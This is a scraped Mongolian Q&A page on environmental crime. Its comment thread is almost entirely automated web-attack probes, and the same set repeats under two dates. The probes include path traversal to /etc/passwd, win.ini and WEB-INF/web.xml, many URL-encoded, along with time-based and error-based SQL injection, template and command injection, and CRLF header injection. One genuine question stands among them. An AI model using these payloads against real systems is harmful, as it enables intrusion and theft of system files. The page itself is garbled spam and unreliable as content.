• Нүүр хуудас
  • Холбоо барих
  • Асуулт хариулт
  • Иргэний хяналт

"Хүрээлэн буй орчны эсрэг гэмт хэрэг"

2020-11-02
../../../../WEB-INF/web.xml;admin 1
2024-06-24 Хариулах
../WEB-INF/web.xml 1
2024-06-24 Хариулах
../../WEB-INF/web.xml 1
2024-06-24 Хариулах
WEB-INF/web.xml 1
2024-06-24 Хариулах
WEB-INF/web.xml;admin 1
2024-06-24 Хариулах
../../../../../../Windows/win.iniadmin 1
2024-06-24 Хариулах
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 1
2024-06-24 Хариулах
../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 1
2024-06-24 Хариулах
../../../../../../../../../../../../../../../../../../Windows/win.ini 1
2024-06-24 Хариулах
..\..\..\..\..\..\Windows\win.ini 1
2024-06-24 Хариулах
.\..\..\..\..\..\..\Windows\win.ini 1
2024-06-24 Хариулах
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 1
2024-06-24 Хариулах
admin 1'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g
2024-06-24 Хариулах
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215windows%u2215win%u002eini 1
2024-06-24 Хариулах
../../../../../../windows/win.ini 1
2024-06-24 Хариулах
admin 1/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('u',0)
2024-06-24 Хариулах
admin 1/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('u',2)
2024-06-24 Хариулах
../../../../../../windows/win.iniadmin 1
2024-06-24 Хариулах
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini 1
2024-06-24 Хариулах
../../../../../../../../../../../../../../../../../../windows/win.ini 1
2024-06-24 Хариулах
admin/**/and/**/cast(md5('1242318497')as/**/int)>0 1
2024-06-24 Хариулах
./../../../../../../../../../../../../../../../../../../windows/win.ini 1
2024-06-24 Хариулах
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1905062916'))) 1
2024-06-24 Хариулах
../../../../../../../../../../../../../../../../../../windows/win.iniadmin 1
2024-06-24 Хариулах
admin"and/**/extractvalue(1,concat(char(126),md5(1660226481)))and" 1
2024-06-24 Хариулах
admin 1/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
2024-06-24 Хариулах
extractvalue(1,concat(char(126),md5(1907804094))) 1
2024-06-24 Хариулах
admin 1/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
2024-06-24 Хариулах
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216windows/win%u002eini 1
2024-06-24 Хариулах
admin 1'/**/and(select'1'from/**/pg_sleep(0))::text>'0
2024-06-24 Хариулах
admin 1'and(select*from(select+sleep(2))a/**/union/**/select+1)='
2024-06-24 Хариулах
..\..\..\..\..\..\windows/win.ini 1
2024-06-24 Хариулах
admin 1"and(select*from(select+sleep(0))a/**/union/**/select+1)="
2024-06-24 Хариулах
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini 1
2024-06-24 Хариулах
admin (select*from(select+sleep(0)union/**/select+1)a)
2024-06-24 Хариулах
admin (select*from(select+sleep(2)union/**/select+1)a)
2024-06-24 Хариулах
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini 1
2024-06-24 Хариулах
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini 1
2024-06-24 Хариулах
admin 1'and'y'='u
2024-06-24 Хариулах
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215windows%u2215win%u002eini 1
2024-06-24 Хариулах
admin 1"and"v"="v
2024-06-24 Хариулах
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini 1
2024-06-24 Хариулах
../../../../../../windows/win.ini 1
2024-06-24 Хариулах
admin 1/**/and+1=7
2024-06-24 Хариулах
admin 1'and'x'='x
2024-06-24 Хариулах
./../../../../../../../../../../../../../../../../../../windows/win.ini 1
2024-06-24 Хариулах
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',0)='z 1
2024-06-24 Хариулах
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('v',2)='v 1
2024-06-24 Хариулах
admin 1/**/and+3=3
2024-06-24 Хариулах
admin"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 1
2024-06-24 Хариулах
admin <%- 952465355+825752463 %>
2024-06-24 Хариулах
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini 1
2024-06-24 Хариулах
admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 1
2024-06-24 Хариулах
admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0 1
2024-06-24 Хариулах
admin 1$(expr 882302514 + 965568281)
2024-06-24 Хариулах
..\..\..\..\..\..\windows/win.ini 1
2024-06-24 Хариулах
admin'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 1
2024-06-24 Хариулах
admin 1&set /A 948914264+841989826
2024-06-24 Хариулах
admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 1
2024-06-24 Хариулах
admin&set /A 991127686+967488288 1
2024-06-24 Хариулах
admin 1
2024-06-24 Хариулах
admin 1
2024-06-24 Хариулах
admin mpizozdduipbydgwgsez
2024-06-24 Хариулах
admin 1
2024-06-24 Хариулах
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini 1
2024-06-24 Хариулах
admin 1
2024-06-24 Хариулах
admin /*1*/{{869659490+865213033}}
2024-06-24 Хариулах
/*1*/{{881831971+901819716}} 1
2024-06-24 Хариулах
admin"and"n"="n 1
2024-06-24 Хариулах
%u2215etc%u2215passwd 1
2024-06-24 Хариулах
admin$(expr 959088819 + 814785954) 1
2024-06-24 Хариулах
admin 1
2024-06-24 Хариулах
""sesrftoo="" 1
2024-06-24 Хариулах
admin 1'"\(
2024-06-24 Хариулах
${940631046+868382846} 1
2024-06-24 Хариулах
/etc/passwd 1
2024-06-24 Хариулах
admin 1/**/and/**/cast(md5('1228186581')as/**/int)>0
2024-06-24 Хариулах
/etc/passwdadmin 1
2024-06-24 Хариулах
"sesrftoo=" 1
2024-06-24 Хариулах
admin expr 858992595 + 937968924 1
2024-06-24 Хариулах
admin"and"b"="v 1
2024-06-24 Хариулах
${@var_dump(md5(534145296))}; 1
2024-06-24 Хариулах
admin 1'and/**/extractvalue(1,concat(char(126),md5(1477403794)))and'
2024-06-24 Хариулах
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 1
2024-06-24 Хариулах
admin'and'm'='v 1
2024-06-24 Хариулах
admin 1\r\nCRLF-Header:CRLF-Value
2024-06-24 Хариулах
${820909009+816698164} 1
2024-06-24 Хариулах
admin 1
2024-06-24 Хариулах
admin '+(41781*41751)+'
2024-06-24 Хариулах
../../../../../../etc/passwd 1
2024-06-24 Хариулах
admin 1
2024-06-24 Хариулах
admin ${930771542+885819279}
2024-06-24 Хариулах
../../../../../../etc/passwdadmin 1
2024-06-24 Хариулах
admin 1
2024-06-24 Хариулах
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 1
2024-06-24 Хариулах
admin 1%0d%0aCRLF-Header:CRLF-Value
2024-06-24 Хариулах
./../../../../../../../../../../../../../../../../../../etc/passwd 1
2024-06-24 Хариулах
хүрээлэн буй орчны гэмт хэрэг гэж юу вэ?
2023-12-10 Хариулах
../../../../WEB-INF/web.xml;admin 1
2023-12-10
../WEB-INF/web.xml 1
2023-12-10
../../WEB-INF/web.xml 1
2023-12-10
WEB-INF/web.xml 1
2023-12-10
WEB-INF/web.xml;admin 1
2023-12-10
../../../../../../Windows/win.iniadmin 1
2023-12-10
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 1
2023-12-10
../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 1
2023-12-10
../../../../../../../../../../../../../../../../../../Windows/win.ini 1
2023-12-10
..\..\..\..\..\..\Windows\win.ini 1
2023-12-10
.\..\..\..\..\..\..\Windows\win.ini 1
2023-12-10
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 1
2023-12-10
admin 1'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g
2023-12-10
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215windows%u2215win%u002eini 1
2023-12-10
../../../../../../windows/win.ini 1
2023-12-10
admin 1/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('u',0)
2023-12-10
admin 1/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('u',2)
2023-12-10
../../../../../../windows/win.iniadmin 1
2023-12-10
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini 1
2023-12-10
../../../../../../../../../../../../../../../../../../windows/win.ini 1
2023-12-10
admin/**/and/**/cast(md5('1242318497')as/**/int)>0 1
2023-12-10
./../../../../../../../../../../../../../../../../../../windows/win.ini 1
2023-12-10
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1905062916'))) 1
2023-12-10
../../../../../../../../../../../../../../../../../../windows/win.iniadmin 1
2023-12-10
admin"and/**/extractvalue(1,concat(char(126),md5(1660226481)))and" 1
2023-12-10
admin 1/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
2023-12-10
extractvalue(1,concat(char(126),md5(1907804094))) 1
2023-12-10
admin 1/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
2023-12-10
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216windows/win%u002eini 1
2023-12-10
admin 1'/**/and(select'1'from/**/pg_sleep(0))::text>'0
2023-12-10
admin 1'and(select*from(select+sleep(2))a/**/union/**/select+1)='
2023-12-10
..\..\..\..\..\..\windows/win.ini 1
2023-12-10
admin 1"and(select*from(select+sleep(0))a/**/union/**/select+1)="
2023-12-10
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini 1
2023-12-10
admin (select*from(select+sleep(0)union/**/select+1)a)
2023-12-10
admin (select*from(select+sleep(2)union/**/select+1)a)
2023-12-10
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini 1
2023-12-10
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini 1
2023-12-10
admin 1'and'y'='u
2023-12-10
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215windows%u2215win%u002eini 1
2023-12-10
admin 1"and"v"="v
2023-12-10
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini 1
2023-12-10
../../../../../../windows/win.ini 1
2023-12-10
admin 1/**/and+1=7
2023-12-10
admin 1'and'x'='x
2023-12-10
./../../../../../../../../../../../../../../../../../../windows/win.ini 1
2023-12-10
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',0)='z 1
2023-12-10
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('v',2)='v 1
2023-12-10
admin 1/**/and+3=3
2023-12-10
admin"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 1
2023-12-10
admin <%- 952465355+825752463 %>
2023-12-10
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini 1
2023-12-10
admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 1
2023-12-10
admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0 1
2023-12-10
admin 1$(expr 882302514 + 965568281)
2023-12-10
..\..\..\..\..\..\windows/win.ini 1
2023-12-10
admin'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 1
2023-12-10
admin 1&set /A 948914264+841989826
2023-12-10
admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 1
2023-12-10
admin&set /A 991127686+967488288 1
2023-12-10
admin 1
2023-12-10
admin 1
2023-12-10
admin mpizozdduipbydgwgsez
2023-12-10
admin 1
2023-12-10
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini 1
2023-12-10
admin 1
2023-12-10
admin /*1*/{{869659490+865213033}}
2023-12-10
/*1*/{{881831971+901819716}} 1
2023-12-10
admin"and"n"="n 1
2023-12-10
%u2215etc%u2215passwd 1
2023-12-10
admin$(expr 959088819 + 814785954) 1
2023-12-10
admin 1
2023-12-10
""sesrftoo="" 1
2023-12-10
admin 1'"\(
2023-12-10
${940631046+868382846} 1
2023-12-10
/etc/passwd 1
2023-12-10
admin 1/**/and/**/cast(md5('1228186581')as/**/int)>0
2023-12-10
/etc/passwdadmin 1
2023-12-10
"sesrftoo=" 1
2023-12-10
admin expr 858992595 + 937968924 1
2023-12-10
admin"and"b"="v 1
2023-12-10
${@var_dump(md5(534145296))}; 1
2023-12-10
admin 1'and/**/extractvalue(1,concat(char(126),md5(1477403794)))and'
2023-12-10
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 1
2023-12-10
admin'and'm'='v 1
2023-12-10
admin 1\r\nCRLF-Header:CRLF-Value
2023-12-10
${820909009+816698164} 1
2023-12-10
admin 1
2023-12-10
admin '+(41781*41751)+'
2023-12-10
../../../../../../etc/passwd 1
2023-12-10
admin 1
2023-12-10
admin ${930771542+885819279}
2023-12-10
../../../../../../etc/passwdadmin 1
2023-12-10
admin 1
2023-12-10
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 1
2023-12-10
admin 1%0d%0aCRLF-Header:CRLF-Value
2023-12-10
./../../../../../../../../../../../../../../../../../../etc/passwd 1
2023-12-10